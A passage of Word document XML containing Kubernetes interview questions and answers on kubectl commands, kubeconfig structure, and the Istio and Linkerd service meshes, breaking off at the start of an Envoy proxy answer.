        <w:t>A: kubectl is the command-line tool used to interact with and manage a cluster in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kubectl is the “control interface” for Kubernetes—used to deploy apps, inspect resources, and debug the cluster.</w:t>
        <w:br/>
        <w:t>It communicates with the kube-apiserver, which is the central control point of Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why kubectl is used</w:t>
        <w:br/>
        <w:t>It allows you to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deploy applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * View cluster resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Debug Pods and Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scale workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manage configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Perform rollouts and rollbacks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How kubectl works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. You run a command using kubectl</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. kubectl sends request to kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. API server processes the request</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Cluster state is updated or returned</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common kubectl commands</w:t>
        <w:br/>
        <w:t>1. Get resources</w:t>
        <w:br/>
        <w:t>kubectl get pods</w:t>
        <w:br/>
        <w:t>kubectl get services</w:t>
        <w:br/>
        <w:t>kubectl get deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Create resources</w:t>
        <w:br/>
        <w:t>kubectl apply -f deployment.yaml</w:t>
        <w:br/>
        <w:t>________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q290. Describe resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kubectl describe pod my-pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Delete resources</w:t>
        <w:br/>
        <w:t>kubectl delete pod my-pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Debugging</w:t>
        <w:br/>
        <w:t>kubectl logs my-pod</w:t>
        <w:br/>
        <w:t>kubectl exec -it my-pod -- /bin/bash</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages entire Kubernetes cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with YAML manifests</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports declarative and imperative commands</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provides real-time cluster interaction</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubectl vs Kubernetes components</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubectl</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Client tool (user interface)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-apiserver</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Central control plane API</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-scheduler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Assigns pods to nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubelet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs containers on nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes as a smart city:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster = city</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubectl = remote control or command app used to manage everything in the city</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concept</w:t>
        <w:br/>
        <w:t>kubectl does NOT directly manage containers—it always talks to the API server, which enforces all cluster changes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advanced usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubectl rollout (deploy/rollback apps)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubectl scale (adjust replicas)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubectl port-forward (debug services)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubectl top (monitor usage)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kubectl is the command-line interface tool for Kubernetes that allows users to interact with the cluster by sending requests to the kube-apiserver to create, manage, inspect, and debug cluster resources such as Pods, Deployments, and Services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q291. Explain kubeconfig.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A kubeconfig file is a configuration file used by kubectl to connect and authenticate to a cluster in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kubeconfig tells kubectl which cluster to connect to, how to authenticate, and which user/namespace to use.</w:t>
        <w:br/>
        <w:t>Without kubeconfig, kubectl doesn’t know:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * where the cluster is</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * how to access it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * what permissions you have</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why kubeconfig is needed</w:t>
        <w:br/>
        <w:t>It enables:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Secure authentication to clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Switching between multiple clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managing multiple users and environments (dev/staging/prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Defining default namespaces and contexts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where kubeconfig is stored</w:t>
        <w:br/>
        <w:t>By default:</w:t>
        <w:br/>
        <w:t>~/.kube/config</w:t>
        <w:br/>
        <w:t>You can also use a custom file:</w:t>
        <w:br/>
        <w:t>kubectl --kubeconfig=/path/to/config get pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Structure of kubeconfig</w:t>
        <w:br/>
        <w:t>A kubeconfig file has 3 main parts:</w:t>
        <w:br/>
        <w:t>1. Clusters</w:t>
        <w:br/>
        <w:t>Defines cluster details:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API server URL</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CA certificate</w:t>
        <w:br/>
        <w:t>2. Users</w:t>
        <w:br/>
        <w:t>Defines credentials:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * certificates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * tokens</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * exec authentication (cloud login)</w:t>
        <w:br/>
        <w:t>3. Contexts</w:t>
        <w:br/>
        <w:t>Links:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * cluster + user + namespace</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example kubeconfig</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Config</w:t>
        <w:br/>
        <w:t>clusters:</w:t>
        <w:br/>
        <w:t>- name: dev-cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server: https://1.2.3.4:6443</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>users:</w:t>
        <w:br/>
        <w:t>- name: dev-user</w:t>
        <w:br/>
        <w:t xml:space="preserve">  user:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    token: abc123</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>contexts:</w:t>
        <w:br/>
        <w:t>- name: dev-context</w:t>
        <w:br/>
        <w:t xml:space="preserve">  context:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cluster: dev-cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">    user: dev-user</w:t>
        <w:br/>
        <w:t xml:space="preserve">    namespace: default</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>current-context: dev-context</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is a context?</w:t>
        <w:br/>
        <w:t>A context is a combination of cluster + user + namespace.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * dev-context → dev cluster + dev user + default namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * prod-context → prod cluster + admin user + prod namespace</w:t>
        <w:br/>
        <w:t>Switch context:</w:t>
        <w:br/>
        <w:t>kubectl config use-context dev-context</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubeconfig workflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. kubectl reads kubeconfig file</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Gets current context</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Finds cluster endpoint</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Uses user credentials</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Sends request to kube-apiserver</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubeconfig vs kubectl</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubeconfig</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubectl</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Config file</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CLI tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Authentication &amp; connection info</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Execute commands</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Execution</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security importance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Contains sensitive credentials (tokens/certs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Should be protected with file permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid sharing publicly</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of kubeconfig like:</w:t>
        <w:br/>
        <w:t>A “saved login profile” for different Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster = server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * User = identity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Context = selected account/environment</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports multiple clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports multiple users</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enables easy switching environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Required for kubectl operations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A kubeconfig file in Kubernetes is a configuration file used by kubectl to define cluster endpoints, user credentials, and contexts, enabling secure authentication and seamless interaction with multiple Kubernetes clusters and environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q292. Explain Istio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Istio is a service mesh platform used to manage, secure, and observe microservices communication inside clusters like Kubernetes without changing application code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Istio is a “traffic control system” for microservices that sits between services and controls all communication.</w:t>
        <w:br/>
        <w:t>It implements a full service mesh using sidecar proxies.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Istio is used</w:t>
        <w:br/>
        <w:t>In microservices environments:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services communicate heavily with each other</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need retries, security, routing, and monitoring everywhere</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Adding this logic inside each app is complex</w:t>
        <w:br/>
        <w:t>Istio solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Moving networking logic out of applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling it at infrastructure level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Istio architecture</w:t>
        <w:br/>
        <w:t>Istio has 2 main parts:</w:t>
        <w:br/>
        <w:t>1. Data Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Made of Envoy proxies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs as sidecar container in each Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles all inbound/outbound traffic</w:t>
        <w:br/>
        <w:t>2. Control Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Called istiod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages configuration and policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributes rules to Envoy proxies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>Service A → Envoy Proxy → Envoy Proxy → Service B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features of Istio</w:t>
        <w:br/>
        <w:t>1. Traffic management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Request routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic splitting (canary releases)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A/B testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fault injection (for testing failures)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Security (Zero Trust)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mutual TLS (mTLS) between services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatic certificate management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service identity-based authentication</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics (latency, error rate, traffic volume)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed tracing (request flow across services)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logging and monitoring integration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Istio works (simplified)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. You deploy Istio in the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Sidecar proxies (Envoy) are injected into Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. All traffic goes through Envoy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Istiod configures traffic rules and security policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Envoy enforces them at runtime</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use case</w:t>
        <w:br/>
        <w:t>Canary deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 90% traffic → v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 10% traffic → v2</w:t>
        <w:br/>
        <w:t>Istio handles this without changing app code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Istio vs Kubernetes networking</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Istio</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>mTLS, identity-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No fine control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Observability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deep tracing + metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes = roads and basic traffic system</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio = smart traffic controller with surveillance, toll gates, and routing rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Components of Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Envoy Proxy → handles traffic (data plane)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * istiod → control plane (config, security, discovery)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress/Egress Gateways → control external traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large microservices systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Need advanced traffic control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong security requirements (zero trust)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Observability at scale</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Downsides</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Complex setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resource overhead (sidecars per pod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Steeper learning curve</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Istio is an open-source service mesh platform that manages microservices communication in Kubernetes by deploying Envoy sidecar proxies for traffic control, security (mTLS), and observability, all centrally managed through the istiod control plane without requiring changes to application code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q293. What is Linkerd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Linkerd is a lightweight service mesh used to manage service-to-service communication, security, and observability in microservices environments running on platforms like Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Linkerd simplifies and secures communication between microservices without changing application code.</w:t>
        <w:br/>
        <w:t>It provides a minimal, fast, and easy-to-operate service mesh compared to heavier alternatives.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Linkerd is used</w:t>
        <w:br/>
        <w:t>In microservices architectures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services communicate frequently</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need reliability, retries, metrics, and security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Adding this logic in every app increases complexity</w:t>
        <w:br/>
        <w:t>Linkerd solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Injecting lightweight proxies into Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling all network communication automatically</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Linkerd works</w:t>
        <w:br/>
        <w:t>Linkerd uses a data plane + control plane architecture:</w:t>
        <w:br/>
        <w:t>1. Data plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lightweight proxy called Linkerd proxy (Rust-based)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs as a sidecar container in each Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles all inbound/outbound traffic</w:t>
        <w:br/>
        <w:t>2. Control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages configuration and policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provides service discovery and telemetry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pushes rules to proxies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>Service A → Linkerd Proxy → Linkerd Proxy → Service B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Traffic reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatic retries</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Timeouts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Circuit breaking</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mutual TLS (mTLS) by default</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatic encryption between services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service identity-based authentication</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time metrics (latency, success rate, traffic volume)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service-level dashboards</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed tracing integration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Linkerd vs Istio (important comparison)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Linkerd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Istio</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very lightweight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Heavier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited advanced features</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Highly customizable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Proxy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rust-based proxy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Envoy proxy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of microservices like people in an office:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services = employees</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Linkerd = simple receptionist system that:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * connects calls</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ensures secure communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * tracks who talks to whom</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use Linkerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You want a simple service mesh</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need fast setup and low overhead</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You prefer minimal configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You are running production microservices with basic mesh needs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When NOT to use Linkerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need advanced traffic shaping (complex canary rules)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need deep extensibility and custom policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Large enterprise mesh with heavy customization needs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy installation and operation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lightweight and fast</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong security by default (mTLS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Good observability out of the box</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Linkerd is a lightweight open-source service mesh for Kubernetes that manages service-to-service communication by deploying sidecar proxies to provide automatic mTLS security, load balancing, retries, and observability with minimal operational complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q294. Explain Envoy proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Envoy Proxy is a high-performance, open-source edge and service proxy used to manage network traffic between services, especially in microservices and service mesh architectures like Kubernetes.</w:t>
        <w:br/>
        <w:t>It is the core data-plane proxy used in systems like Istio.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
